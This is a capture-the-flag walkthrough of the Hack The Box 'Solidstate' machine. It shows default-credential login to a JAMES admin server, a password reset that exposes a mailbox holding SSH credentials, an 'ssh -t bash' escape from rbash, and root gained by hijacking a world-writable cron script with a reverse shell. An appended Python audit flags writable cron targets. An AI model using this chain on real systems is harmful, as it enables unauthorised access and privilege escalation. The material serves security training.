HTB — Solidstate

Raj Singh
4 min read · Sep 30, 2019

Machine IP: 10.10.10.51

Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello 10.10.10.51 (10.10.14.7 [10.10.14.7]),
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home — Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

After some enumeration I found the default credentials for the JAMES server on Exploit-DB.

Using them I moved on to the JAMES admin server, which was running on port 4555.

So I just tried to log in to the JAMES admin server with the default credentials.

JAMES ADMIN SERVER

With the JAMES admin server we can change any user's password; here we changed mindy's password.

Now that mindy's password is changed, let's log in to POP3 as mindy with the password we set from the JAMES admin server.

telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS mindy
+OK Welcome mindy
help
-ERR
LIST
+OK 2 1945
1 1109
2 836
.
TOP 2 836
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James

Yup, here we got mindy's SSH password; now let's connect as mindy with it.

BINGO!! We got a shell as user mindy.

Here we got user.txt.

But mindy's shell is a restricted bash (rbash) and does not let us leave the directory:

mindy@solidstate:~$ cd bin
-rbash: cd: restricted

We can bypass it by telling ssh to start a normal bash instead of the login shell:

ssh mindy@10.10.10.51 -t bash

Here we got a bash shell without any restrictions, so let's begin post-exploitation enumeration with linuxprivchecker.py.

It found a world-writable file at /opt/tmp.py, which is run by root every 5 minutes, so we can put our nc reverse shell command into it and get a root reverse shell.

Successfully placed our reverse shell; now let's wait for root to run it.

BOOM! Got ROOT 🙌
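The weakness that gives root here is a root cron job executing a file that other users can write. As an added example (not part of the original write-up or of the box), here is a small Python audit that parses system-crontab lines and flags referenced paths whose file or parent directory is group- or world-writable; the crontab text and the files it points at are constructed in a temp directory, and the cron-line regex is an assumption that does not cover @reboot-style shortcuts.

```python
import os
import re
import stat
import tempfile

# System crontab format: five schedule fields, a user, then the command.
# (Assumption: @reboot / @daily shortcuts are not matched by this regex.)
CRON_LINE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def cron_commands(crontab_text):
    """Return (user, command) pairs from a system crontab, skipping comments."""
    out = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if m:
            out.append((m.group("user"), m.group("cmd")))
    return out

def find_hijackable(crontab_text):
    """Flag absolute paths in cron commands whose file or parent directory is
    group- or world-writable: anyone with that access can alter what cron runs."""
    findings = []
    loose = stat.S_IWGRP | stat.S_IWOTH
    for user, cmd in cron_commands(crontab_text):
        for token in cmd.split():
            if not token.startswith("/") or not os.path.exists(token):
                continue
            for path in (token, os.path.dirname(token)):
                mode = os.stat(path).st_mode
                if mode & loose:
                    findings.append((user, path, oct(stat.S_IMODE(mode))))
    return findings

def demo():
    """Constructed scenario modelled on the page: a root job every 5 minutes
    runs a script that is world-writable (0777) next to a sane one (0755)."""
    d = tempfile.mkdtemp()  # created 0700, so the directory itself is not flagged
    bad, good = os.path.join(d, "tmp.py"), os.path.join(d, "backup.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as fh:
            fh.write("# placeholder\n")
        os.chmod(path, mode)
    crontab = f"# constructed sample\n*/5 * * * * root python {bad}\n0 3 * * * root {good}\n"
    return find_hijackable(crontab), bad

if __name__ == "__main__":
    for user, path, mode in demo()[0]:
        print(f"cron job as {user} runs writable path {path} (mode {mode})")
```

On a real host the same check would be fed /etc/crontab and the files under /etc/cron.d; fixing a finding means chown root and mode 0755 or tighter on the script and its directory.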

………………………………..cowabunga……………………………………….


Written by Raj Singh, Security Researcher, Product Security Engineer
